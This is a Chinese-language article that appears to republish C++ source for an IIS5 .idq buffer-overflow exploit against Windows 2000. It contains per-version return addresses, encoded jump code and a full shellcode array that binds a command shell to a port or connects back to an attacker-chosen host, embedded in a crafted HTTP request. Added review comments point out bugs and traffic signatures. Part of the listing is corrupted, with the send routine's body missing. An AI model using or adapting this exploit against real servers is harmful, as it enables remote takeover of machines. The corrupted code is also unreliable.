IIS5_IDQ命令行溢出程序源代码

王朝vc·作者佚名  2006-01-08

IIS5_IDQ溢出……从Internet上学习到的，也让它回归Internet。

文件结构:

cpp文件: iisidqoverflow.cpp 和 SkShellCodeFunc.cpp

头文件: SkShellCodeFunc.h

功能文件: WSAStart.cpp、SnakeSocket.cpp、wsastart.h、snakesocket.h（这4个文件不提供，因为它们实现的只是WSAStart和socket的功能；要成功编译本程序，必须自己替换相关的WSAStart和socket功能的代码。特此声明！）

中间文件: iis_idq.asm --用来生成shellcode数据的文件，编译时不必编译，只是为了中间产生shellcode数据。它实现了溢出后程序的处理：创建一个进程，并且绑定一个端口。这个还可以用于其他的windows溢出。

文件1:iisidqoverflow.cpp (主文件)

#include <afxwin.h>

#include "snakesocket.h"

#include "wsastart.h"

#include "SkShellCodeFunc.h"

//function predeclare.
// Collect the local address information (defined in SkShellCodeFunc.cpp):
// writes this machine's kernel32 GetModuleHandleA/GetProcAddress addresses
// and the "jmp ebx" locations found in user32 into szInfo, at most iMaxSize
// bytes, NUL-terminated.
void GetNecesProcAddr( char *szInfo, int iMaxSize);
// Build the complete IDQ request (defined in SkShellCodeFunc.cpp). pszOutput
// has no size parameter, so the caller's buffer must be large enough for the
// ~10 KB the builder can produce. Returns the request length, or 0 when
// SystemType has no address row or pConnectStruct has an unknown type.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);

// Print the usage text.
// NOTE(review): this listing is corrupted here. The line "for( i=0; i 0){"
// lost everything between "i" and "0){" — most likely an unescaped '<'
// swallowed the text when the page was published — and with it the rest of
// ShowHelp() (judging by the "supported OS types" header it prints, a loop
// over GetSystemName) and the beginning of SendIDQExploit(). The "send(" and
// "return" lines below cannot belong to a void function; they look like the
// tail of SendIDQExploit(), which main() calls as
// SendIDQExploit(socket, SystemType, &connectStruct, szCommand). That tail
// ignores the return value of send().
void ShowHelp()
{
int i;
printf("运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>\r\n");
printf(" 或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>\r\n");
printf("\r\n\r\n 其中,如果输入命令参数没有输入,那么,默认为:\"cmd.exe /c + dir\"");
printf("\r\n 如果为1,那么,将输入新的命令.");
printf("\r\n\r\n支持的操作系统 类型: ----\r\n");
for( i=0; i 0){ // <-- corrupted line, see the note above
send( msocket, szBuff, iLen, 0);
}
return (iLen>0)?true:false;
}

// Command-line driver. Argument layout (see ShowHelp):
//   argv[1]  SYSTEM_TYPE index (raw atoi, checked only against the upper bound)
//   argv[2]  target host, argv[3] web port
//   argv[4]  connect type: 1 = LISTEN_ON_PORT (argv[5] = listen port),
//            2 = CONNECT_TO_HOST (argv[5] = connect-back host, argv[6] = port)
//   one more argument after those makes the program prompt for the command
//   to embed instead of the default "cmd.exe /c dir c:\".
// "GetAddr" as the only argument runs the local address-collection mode.
// CWSAStart / CSnakeSocket are the author's wrappers, not shipped with the
// article (see the file list at the top). Every exit path returns 0, so the
// process status never reports a failure.
int main(int argc, char *argv[])
{
CWSAStart wsaStart;
CSnakeSocket snakeSocket;
WORD wPort;
DWORD dwIP;
if( argc > 1){
// "GetAddr": print this machine's kernel32 addresses and jmp-ebx list
// (GetNecesProcAddr) plus the OS version, then exit. This is the kind of
// data the AllSystemFuncAddr table is made of.
if( stricmp( argv[1], "GetAddr") == 0){
char szTemp[12048];
GetNecesProcAddr(szTemp, sizeof(szTemp) );
printf("%s\r\n",szTemp);
OSVERSIONINFO osInfo;
osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx( &osInfo); // return value not checked
// NOTE(review): DWORD fields printed with %d — a format/type mismatch,
// harmless on 32-bit Windows.
printf("Version: %d - %d. Build:%d. ID:%d\r\n[%s]\r\n",
osInfo.dwMajorVersion, osInfo.dwMinorVersion,
osInfo.dwBuildNumber, osInfo.dwPlatformId,
osInfo.szCSDVersion);
return 0;
}
}
// NOTE(review): off by one. The LISTEN_ON_PORT branch reads argv[5], which
// is argv's NULL terminator when argc == 5; the guard should be `argc < 6`
// (and `argc < 7` in the CONNECT_TO_HOST branch, which reads argv[6]).
if( argc < 5){
ShowHelp();
return 0;
}
wsaStart.StartUP(); // return value not checked
// NOTE(review): atoi() reports no errors and may return a negative number;
// only the upper bound is checked, so depending on the enum's underlying
// type a negative SystemType can pass. Sk_Make_IIS5_IDQ_ShellCode rejects
// it in its switch default; GetSystemName does not.
SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);
if( SystemType >= MAX_SYSTEM_TYPE_NUM){
printf("操作系统类型 不正确.\r\n");
ShowHelp();
return 0;
}
// Resolves the target once as validation; dwIP itself is not used again
// (connect() below is given argv[2]).
dwIP = snakeSocket.GetHostAddr( argv[2]);
if( dwIP == 0){
printf("输入地址不对.\r\n");
return 0;
}
Sk_ConnectType connectType;
ConnectStruct connectStruct; // not zero-initialised; only the chosen branch's fields are set
char szCommand[129]="cmd.exe /c dir c:\\";
BOOL bInputCommand=false;
connectType = (Sk_ConnectType)atoi(argv[4]);
connectStruct.byConnectType = connectType;
switch(connectType){
case LISTEN_ON_PORT:
connectStruct.wListenPort = atoi(argv[5]); // argv[5] is NULL when argc == 5, see the note above
if( argc >= 7){
bInputCommand = true;
}
break;
case CONNECT_TO_HOST:
if( argc < 6){
printf("参数不足够.\r\n");
return 0;
}
connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]); // unlike argv[2], a 0 result is not rejected
connectStruct.wConnectPort = atoi(argv[6]); // argv[6] is NULL when argc == 6
if( argc >= 8){
bInputCommand = true;
}
break;
default:
printf("溢出类型不正确.\r\n");
return 0;
}
if( bInputCommand){
printf("\r\n请输入绑定的命令:");
// NOTE(review): scanf("%s") has no width limit; input longer than 128
// characters overruns szCommand, a stack buffer of this program. "%128s"
// would bound it (the embedded field is wExecCommandSize = 128 bytes anyway).
scanf( "%s",szCommand);
}
snakeSocket.CreateSocket(); // return value not checked
wPort = atoi(argv[3]); // truncated to 16 bits, not range-checked
if( !snakeSocket.connect( argv[2], wPort)){
printf("连接目的机器 %s:%d 失败.\r\n", argv[2], wPort);
return 0;
}
else
printf("连接目的机器 %s:%d OK.\r\n", argv[2], wPort);
// SendIDQExploit's definition is lost in this listing (see the note at
// ShowHelp); only its final send()/return survive. Presumably it calls
// Sk_Make_IIS5_IDQ_ShellCode and sends the result on the connected socket.
BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand);
if( bValue){
printf( "发送shellcode 到 %s:%d OK\r\n", argv[2], wPort);
printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);
}
else{
printf( "发送失败, 对方系统类型不支持\r\n");
}
snakeSocket.CloseSocket();
wsaStart.CleanUP();
return 0;
}

文件2. SkShellCodeFunc.cpp (发送shellcode的文件)

//SkShellCodeFunc.cpp

////////////////////////////////////////////////////////////////////////////////

// shellcode 函数

////////////////////////////////////////////////////////////////////////////////

// start by snake. 2001/7/11

////////////////////////////////////////////////////////////////////////////////

#include <windows.h>

#include "SkShellCodeFunc.h"

// Forward declaration (defined at the end of this file): record up to
// wMaxCount addresses of "jmp ebx" byte pairs found in user32 into dwArray
// and return how many were stored.
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount);

// Display names indexed by SYSTEM_TYPE. There are MAX_SYSTEM_TYPE_NUM+1
// rows: the extra last row is the "Unknown.." fallback GetSystemName returns
// for out-of-range values. Rows starting with "--" are exactly the ones whose
// AllSystemFuncAddr entry is all zeros (no addresses known), which the
// builder rejects.
static const char szSystemName[MAX_SYSTEM_TYPE_NUM+1][60]=
{
"IIS5中文Win2k Sp0",
"IIS5中文Win2k Sp1",
"IIS5中文Win2k Sp2",
"IIS5 English Win2k Sp0",
"IIS5 English Win2k Sp1",
"--IIS5 English Win2k Sp2",
"IIS5 Japanese Win2k Sp0",
"IIS5 Japanese Win2k Sp1",
"--IIS5 Japanese Win2k Sp2",
"IIS5 Mexico Win2k",
"--IIS5 Mexico Win2k sp1",
"--IIS5 Mexico Win2k sp2",
"Unknown..",
};

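// Return the display name for a SYSTEM_TYPE.
// Out-of-range values map to the trailing "Unknown.." row of szSystemName.
// The lower bound matters because SYSTEM_TYPE values are produced by
// casting a raw atoi() result in main(), which can be negative; the
// original only clamped the upper side and would have indexed before the
// start of the table for a negative type.
LPCTSTR GetSystemName( SYSTEM_TYPE type)
{
// szSystemName has MAX_SYSTEM_TYPE_NUM+1 rows; row MAX_SYSTEM_TYPE_NUM is "Unknown..".
if( type < 0 || type > MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM;
return szSystemName[type];
}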

// One row of AllSystemFuncAddr: the two kernel32 addresses the payload uses
// to resolve everything else, plus the address of a "jmp ebx" byte pair that
// the builder writes (as %u text) into the request at the exception-handler
// position.
typedef struct _Call_Func_Addr{
DWORD dwGetModuleHandle; // kernel32 GetModuleHandleA
DWORD dwGetProcAddress; // kernel32 GetProcAddress
DWORD dwRetJmpEbxAddr; // address of an FF E3 ("jmp ebx") byte pair
}Call_Func_Addr;

// Addresses of the two functions (each build has different ones), indexed by
// SYSTEM_TYPE: every Windows 2000 service pack / language build has its own
// row. All-zero rows mean "not known"; the builder returns 0 for them.
// GetNecesProcAddr / Search_Jump_Ebx_Code are the helpers that print these
// values on a local machine. The row comments of the last two entries were
// both labelled SP0 in the original; by position they are
// IIS_WIN2K_MEXICO_SP1 and IIS_WIN2K_MEXICO_SP2.
static const Call_Func_Addr AllSystemFuncAddr[MAX_SYSTEM_TYPE_NUM]=
{
{ 0x77e756db, 0x77e7564b, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP0
{ 0x77e6380e, 0x77e67031, 0x77E4BF17}, //IIS5_WIN2K_CHINESE_SP1
{ 0x77e66c42, 0x77e69ac1, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP2
{ 0x77E956DB, 0x77E9564B, 0x77E6F533}, //IIS5_WIN2K_ENGLISH_SP0
{ 0x77E8380E, 0x77E87031, 0x77E6E52B}, //IIS5_WIN2K_ENGLISH_SP1
{ 0, 0}, //IIS5_WIN2K_ENGLISH_SP2 (third member zero-initialised)
{ 0x77E656DB, 0x77E6564B, 0x77E3AF17}, //IIS5_WIN2K_JAPANESE_SP0,
{ 0x77E5380E, 0x77E57031, 0x77E3BCAF}, //IIS5_WIN2K_JAPANESE_SP1,
{ 0, 0}, //IIS5_WIN2K_JAPANESE_SP2, (third member zero-initialised)
{ 0x77E956DB, 0x77E9564B, 0x77E596D2 },//IIS_WIN2K_MEXICO_SP0,
{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP1 (original comment said SP0)
{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP2 (original comment said SP0)
};

// The analysis behind the #define and the two encoded strings below was
// copied from isno's article (author's credit: thanks isno).
#define IIS5_IDQ_EXCEPTION_OFFSET 234 /* exception handler offset: position in the query string at which the builder places the handler overwrite */
static unsigned char forwardjump[]= "%u08eb"; /* %u-encoded short jump written just before the handler address */
/* Overwrites the exception structure with a "jmp 08h" that skips forward to
   the code below, which locates the payload. */
static unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
/*
Transfers control to the payload; the author does not explain it
instruction by instruction. Note that every %uXXXX unit is byte-swapped on
decoding: %uC033 becomes \x33\xC0.
Both strings are emitted verbatim as "%uXXXX" text in the query string by
Sk_Make_IIS5_IDQ_ShellCode, so they are a fixed, recognisable pattern.
*/

// Assembled image of iis_idq.asm. Author's note: binds a shell to a port and
// listens; the same bytes also handle the connect-back mode, which the
// builder selects through byConnectType. Layout, as far as the bytes show:
//   - a leading run of \x90 (PREHEAD_NOP_SIZE = 0x24 bytes, per the offset
//     macros below);
//   - code beginning \x55\x8B\xEC\x33\xC0\x40\xC1\xE0\x0B\x2B\xE0, i.e. the
//     prologue of _sk_Bind_ConnectShellCode (push ebp / mov ebp,esp /
//     xor eax,eax / inc eax / shl eax,0bh / sub esp,eax);
//   - the stConnectInfo block followed by the 128-byte command field, whose
//     default "cmd.exe" plus '+' filler is readable below;
//   - the import name list in plain ASCII: "kernel32.dll" with 14 API names
//     (TerminateProcess ... CloseHandle) and "ws2_32.dll" with 11 (socket ...
//     gethostname), each entry prefixed by a length byte and padded with '+'
//     so that no NUL byte occurs;
//   - two trailing DWORDs (\xDB\x56\xE7\x77, \x4B\x56\xE7\x77 = 0x77E756DB,
//     0x77E7564B, the IIS5_WIN2K_CHINESE_SP0 row) that the builder overwrites
//     with the selected row.
// The explicit "\x00" at the very end is where the builder's strcat() stops.
// Because the DLL and API names are unencoded, the block is straightforward
// to recognise in traffic or memory captures. Deliberately not const: the
// builder copies it and patches the copy.
char szSnakeBindShellCode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC0\x40\xC1\xE0\x0B\x2B\xE0\xEB\x03\x90\xEB\x4E\xE8\xF9\xFF\xFF\xFF\x55\x8B\xEC\x57\x51\x50\x52\x8B\x7D\x08\x8B\x4D\x0C\x8B\x45\x10\x8B\x55\x14\xF2\xAE\x67\xE3\x06\x4F\x88\x17\x41\xEB\xF5\x5A\x58\x59\x5F\x5D\xC3\x53\x51\x52\x33\xD2\x50\x5B\xC1\xEB\x10\x50\x59\x80\xFF\x01\x74\x02\xFE\xCB\x8A\xC3"
"\x85\xD2\x75\x08\xC1\xE0\x08\x51\x5B\x42\xEB\xEB\x5A\x59\x5B\xC3\xEB\x4F\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x7D\x08\x8B\x75\x0C\x33\xDB\x33\xC9\xB1\x80\x03\xF1\x8A\x0E\x46\x51\x8A\x1E\x46\x56\x8B\x45\x10\xFF\xD0\x03\xF3\x33\xC9\x8A\x0E\x46\x51\x8A\x1E\x46\x50\x56\x56\x50\x8B\x4D\x14\xFF\xD1\x89\x07\x83\xC7"
"\x04\x5E\x58\x03\xF3\x59\xE2\xE7\x59\xE2\xD3\x58\x5B\x59\x5A\x5F\x5E\x5D\xC3\xEB\x7C\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x03\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8D\xBD\xC0\xFC\xFF\xFF\x33\xC0\xB0\x02\x57\x50\x8B\x46\x54\xFF\xD0\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\x38\xFF\xD0\x8B\x55\x0C\x8D\x1A\x8A\x0B\x50\x8D"
"\xBD\x10\xFF\xFF\xFF\x8D\x1F\x33\xC0\xB0\x02\x66\x89\x03\x58\x80\xF9\x01\x75\x69\x50\x50\x8B\x42\x04\xE8\x31\xFF\xFF\xFF\x8B\xC8\x86\xE9\x58\x8D\x5F\x02\x8B\x55\x0C\x66\x89\x0B\x33\xC0\x8D\x5F\x04\x89\x03\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x3C\xFF\xD0\xEB\x02\xEB\x4D\x58\x50\x33\xC9\x41\x51\x50\x8B\x46"
"\x40\xFF\xD0\x58\x50\x33\xC9\xB1\x10\x8D\xBD\x40\xFF\xFF\xFF\x89\x0F\x57\x8D\xBD\x10\xFF\xFF\xFF\x57\x50\x8B\x46\x44\xFF\xD0\x5A\x50\x52\x8B\x46\x58\xFF\xD0\x58\x83\xF8\xFF\x74\x7A\xEB\x53\x50\x8B\x42\x10\xE8\xC9\xFE\xFF\xFF\x8B\xC8\x86\xE9\x8D\x5F\x02\x66\x89\x0B\xEB\x02\xEB\x6A\x8B\x42\x08\xE8\xB3\xFE\xFF\xFF"
"\x8B\xC8\xC1\xE1\x10\x8B\x42\x0C\xE8\xA6\xFE\xFF\xFF\x66\x8B\xC8\x8D\x5F\x04\x89\x0B\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x5C\xFF\xD0\x8B\xC8\x58\x67\xE3\x0B\x90\x50\x8B\x46\x58\xFF\xD0\x33\xC0\xEB\x25\x50\x50\x5A\x8D\xBD\x10\xFF\xFF\xFF\x33\xC0\xB0\x01\x89\x07\xC1\xE0\x02\x50\x57\x66\xB8\x06\x10\x50\x66"
"\xB8\xFF\xFF\x50\x52\x8B\x46\x50\xFF\xD0\x58\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x62\x55\x8B\xEC\x57\x56\x52\x51\x53\x50\x8B\x7D\x0C\x57\x5A\x33\xC0\x8D\x7F\x24\x57\x33\xC9\xB1\x44\xF3\xAA\x5F\x8D\x37\xB1\x44\x89\x0E\x8D\x77\x2C\x66\xB9\x01\x01\x89\x0E\x57\x8D\x7F\x38\x8D\x72\x0C\x8B\x06\x89\x07\x5F\x57\x8D"
"\x7F\x3C\x8D\x72\x04\x8B\x06\x89\x07\x5F\x8B\x75\x08\x8B\x46\x30\xFF\xD0\x33\xC9\x51\x41\x51\x41\x51\x8D\x57\x40\x52\x50\x56\x8B\x75\x0C\x8D\x76\x04\x8B\x1E\x5E\xEB\x02\xEB\x42\x53\x50\x8B\x46\x2C\xFF\xD0\x33\xC0\x8B\x7D\x0C\x8D\x57\x14\x52\x8D\x57\x24\x52\x50\x50\x50\x40\x50\x48\x50\x50\x8B\x55\x10\x52\x50\x8B"
"\x46\x0C\xFF\xD0\x8B\x47\x0C\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x04\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59\x5A\x5E\x5F\x8B\xE5\x5D\xC3\xEB\x33\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x75\x08\x8B\x7D\x0C\x8B\x47\x10\x50\x8B\x46\x58\xFF\xD0\x8B\x07\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x08\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59"
"\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x77\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x02\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x8D\x55\xF8\x33\xC0\x40\x89\x02\x8D\x55\xF8\x8B\x02\x85\xC0\x74\x2A\x33\xC0\x50\xB0\xF0\x50\x8D\x85\x08\xFF\xFF\xFF\x50\x8D\x5F\x10\x8B\x03\x50\x8B\x46\x4C\xFF\xD0\x83\xF8\xFF\x75\x0F\x50"
"\x5A\x8B\x46\x28\xFF\xD0\x66\x3D\x4C\x27\x74\x28\xEB\x7F\x85\xC0\x74\x7B\x7E\x20\x33\xD2\x52\x8D\x5D\xFC\x53\x50\x8D\x9D\x08\xFF\xFF\xFF\x53\x8B\x47\x08\x50\x8B\x46\x18\xFF\xD0\x85\xC0\x74\x5D\xEB\x02\xEB\x62\x33\xC0\x50\x8D\x55\xFC\x52\x50\x50\x50\x8B\x07\x50\x8B\x46\x10\xFF\xD0\x8B\x45\xFC\x85\xC0\x74\x3B\x33"
"\xC0\x50\x8D\x55\xFC\x52\xB0\xF0\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x07\x50\x8B\x46\x1C\xFF\xD0\x85\xC0\x74\x23\x33\xC0\x50\x8B\x45\xFC\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x47\x10\x50\x8B\x46\x48\xFF\xD0\x83\xF8\xFF\x74\x07\xEB\xAC\xE9\x4C\xFF\xFF\xFF\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x72\x55\x8B\xEC\x33"
"\xC0\xB0\xF0\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x33\xDB\x8D\x7D\xF0\x8D\x57\x04\x89\x1A\x8D\x57\x08\x43\x89\x1A\x8D\x17\xB3\x0C\x89\x1A\x33\xDB\x57\x53\x57\x8B\x7D\x0C\x8D\x57\x04\x89\x1A\x52\x8D\x17\x52\x8B\x46\x04\xFF\xD0\x5F\x85\xC0\x74\x1F\x33\xDB\x53\x57\x8B\x7D\x0C\x8D\x57\x08\x52\x8D\x57"
"\x0C\x89\x1A\x52\x8B\x46\x04\xFF\xD0\x85\xC0\x74\x05\x33\xC0\x40\xEB\x05\x33\xC0\xEB\x01\x90\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\x8D\x34\x24\x8B\x36\x33\xC9\x66\xB9\xCC\x04\x03\xF1\x8D\xBD\x30\xFE\xFF\xFF\x57\x66\xB9\xFA\x01\xF3\xA4\x5F\x57\x33\xC9\x51\xB1\x2B\x51\x66\xB9\xE6\x01\x51\x33\xDB\xB3\x14\x03\xFB\x57"
"\xE8\xCC\xFB\xFF\xFF\x83\xC4\x10\x33\xC9\x66\xB9\xDD\x01\x8B\xF7\x03\xF1\x8B\x46\x04\x50\x8B\x06\x50\x57\x8D\xB5\x30\xFD\xFF\xFF\x56\xE8\xF6\xFB\xFF\xFF\x83\xC4\x10\x5F\x57\x56\xE8\x3C\xFC\xFF\xFF\x83\xC4\x08\x85\xC0\x74\x57\x8D\xBD\x10\xFC\xFF\xFF\x8D\x5F\x10\x89\x03\x57\x56\xE8\x16\xFF\xFF\xFF\x83\xC4\x08\x85"
"\xC0\x74\x3E\x8D\xBD\x30\xFE\xFF\xFF\x33\xC0\xB0\x14\x03\xF8\x57\x8D\xBD\x10\xFC\xFF\xFF\x57\x56\xE8\x3B\xFD\xFF\xFF\x83\xC4\x0C\x57\x56\xE8\x0E\xFE\xFF\xFF\x83\xC4\x08\x57\x56\xE8\xCF\xFD\xFF\xFF\x83\xC4\x08\x33\xC0\x50\x8D\x57\x14\x8B\x02\x50\x8B\x06\xFF\xD0\x33\xC0\x50\x8B\x46\x24\xFF\xD0\xC3\x8B\xE5\x5D\x90"
"\x90\x02\xFF\xFF\xFF\x51\x01\x01\x02\x01\x02\x25\x01\xC0\x01\xA8\x01\x58\x01\x01\x02\x63\x6D\x64\x2E\x65\x78\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B"
"\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x02\x0E\x6B\x65\x72\x6E\x65"
"\x6C\x33\x32\x2E\x64\x6C\x6C\x2B\x2B\x0E\x11\x54\x65\x72\x6D\x69\x6E\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x2B\x0B\x43\x72\x65\x61\x74\x65\x50\x69\x70\x65\x2B\x10\x47\x65\x74\x53\x74\x61\x72\x74\x75\x70\x49\x6E\x66\x6F\x41\x2B\x0F\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x2B\x0E\x50\x65\x65\x6B"
"\x4E\x61\x6D\x65\x64\x50\x69\x70\x65\x2B\x0C\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x2B\x0B\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x2B\x2B\x09\x52\x65\x61\x64\x46\x69\x6C\x65\x2B\x06\x53\x6C\x65\x65\x70\x2B\x0C\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0E\x47\x65\x74\x4C\x61\x73\x74\x45\x72\x72\x6F\x72"
"\x2B\x2B\x10\x44\x75\x70\x6C\x69\x63\x61\x74\x65\x48\x61\x6E\x64\x6C\x65\x2B\x12\x47\x65\x74\x43\x75\x72\x72\x65\x6E\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0C\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64\x6C\x65\x2B\x0B\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x2B\x0B\x07\x73\x6F\x63\x6B\x65\x74\x2B\x05\x62\x69\x6E\x64\x2B"
"\x07\x6C\x69\x73\x74\x65\x6E\x2B\x07\x61\x63\x63\x65\x70\x74\x2B\x05\x73\x65\x6E\x64\x2B\x05\x72\x65\x63\x76\x2B\x0B\x73\x65\x74\x73\x6F\x63\x6B\x6F\x70\x74\x2B\x0B\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x2B\x0C\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x2B\x08\x63\x6F\x6E\x6E\x65\x63\x74\x2B\x0C\x67\x65\x74"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\xDB\x56\xE7\x77\x4B\x56\xE7\x77\x00";

// Author's private marker. It is copied (without its terminator) to the very
// start of the query string, so every request built here begins with
// "/n.idq?snake_program_code_v2.0" — a literal worth matching on.
static const char szSnakeSign[]="snake_program_code_v2.0";
// Byte offsets inside szSnakeBindShellCode. PREHEAD_NOP_SIZE (0x24 = 36) is
// the length of the leading \x90 run; the other numbers are positions in the
// assembled iis_idq.asm image. The first six map onto stConnectInfo (type at
// +0, listen port at +4, the two IP halves at +8/+12, connect port at +16,
// 20 bytes in all) and the 128-byte command field that directly follows it.
// The last two appear to address the two DWORDs at the very end of the image
// (the literal ends with the IIS5_WIN2K_CHINESE_SP0 addresses).
// NOTE(review): the macros are unparenthesised; safe as plain array indices,
// which is their only use here, but `2*dwConnectType_Offset` would not mean
// what it looks like.
#define PREHEAD_NOP_SIZE 0x24
#define dwConnectType_Offset 1249+PREHEAD_NOP_SIZE
#define dwListenPort_Offset 1253+PREHEAD_NOP_SIZE
#define dwConnectIP1_Offset 1257+PREHEAD_NOP_SIZE
#define dwConnectIP2_Offset 1261+PREHEAD_NOP_SIZE
#define dwConnectPort_Offset 1265+PREHEAD_NOP_SIZE
#define dwExecCommand_Offset 1269+PREHEAD_NOP_SIZE
#define wExecCommandSize 128
#define dwGetModuleHandle_Offset 1746+PREHEAD_NOP_SIZE
#define dwGetProcAddress_Offset 1750+PREHEAD_NOP_SIZE
// Byte values that must never appear in the request: NUL ends the C strings
// the builder concatenates, CR/LF end the HTTP header. Not const, although
// nothing writes it.
BYTE byReservedValue[]={ 0, 0x0a, 0x0d};
;// Conversion of a plain word into the "snake shellcode reserved value" form
;// (Convert_Ansi_Word_To_Sk_Long below): a byte equal to 0, 0x0a or 0x0d is
;// stored with high byte 2 and low byte value+1;
;// any other byte is stored with high byte 1 and the value unchanged.
;// (The leading ';' on these three lines are stray empty declarations at file scope.)

// Encode a 16-bit value so that the request never carries a NUL, CR or LF
// byte. Each input byte becomes a 16-bit unit: 0x01xx for an ordinary byte
// xx, 0x02(xx+1) for a byte listed in byReservedValue. The unit built from
// the high input byte ends up in the high half of the result, the unit of
// the low byte in the low half. _convert_Sk_Long_To_Ansi_Word in
// iis_idq.asm performs the inverse.
DWORD Convert_Ansi_Word_To_Sk_Long(WORD wValue)
{
const int iReservCount = sizeof(byReservedValue)/sizeof(BYTE);
// High byte first, then low byte: this order fixes the result layout.
const WORD wParts[2] = { (WORD)((wValue >> 8) & 0xff), (WORD)(wValue & 0xff) };
DWORD dwRetValue = 0;
for( int iPart = 0; iPart < 2; iPart++){
WORD wUnit = wParts[iPart];
int iReserv = 0;
while( iReserv < iReservCount && wUnit != byReservedValue[iReserv]) iReserv++;
if( iReserv < iReservCount){
wUnit++; // reserved byte: move it out of the forbidden set...
wUnit |= 0x0200; // ...and tag the unit as "adjusted"
}
else{
wUnit |= 0x0100; // ordinary byte: tag the unit as "plain"
}
dwRetValue = (dwRetValue << 16) | wUnit;
}
return dwRetValue;
}

typedef void (*SkRunPointer)(); // function-pointer type; not referenced anywhere in this listing

// Build the complete HTTP request for one target configuration.
//   pszOutput      receives the request; there is no size parameter, so the
//                  caller's buffer must hold whatever szOutput (10000 bytes)
//                  ends up containing
//   SystemType     selects the AllSystemFuncAddr row
//   pConnectStruct listen port, or connect-back IP/port; byConnectType
//                  decides which fields are read
//   lpszBindCmd    command text embedded in the payload, cut to
//                  wExecCommandSize-1 characters
// Returns the request length, or 0 when SystemType has no address row
// (IIS5_WIN2K_ENGLISH_SP2 or any row whose dwGetModuleHandle is 0) or when
// byConnectType is neither LISTEN_ON_PORT nor CONNECT_TO_HOST.
//
// Shape of the request, useful for recognising it on the wire:
//   "GET /n.idq?" + szBuf + "=b HTTP/1.0\r\nSnake: " + szCreateCode + "\r\n\r\n"
// szBuf starts with the literal "snake_program_code_v2.0", is padded with
// 0x01 bytes and carries the "%uXXXX" text of forwardjump, dwRetJmpEbx and
// jump_to_shell around IIS5_IDQ_EXCEPTION_OFFSET; the non-standard "Snake:"
// header carries szSnakeBindShellCode with the connection parameters, the
// command and the two kernel32 addresses patched in.
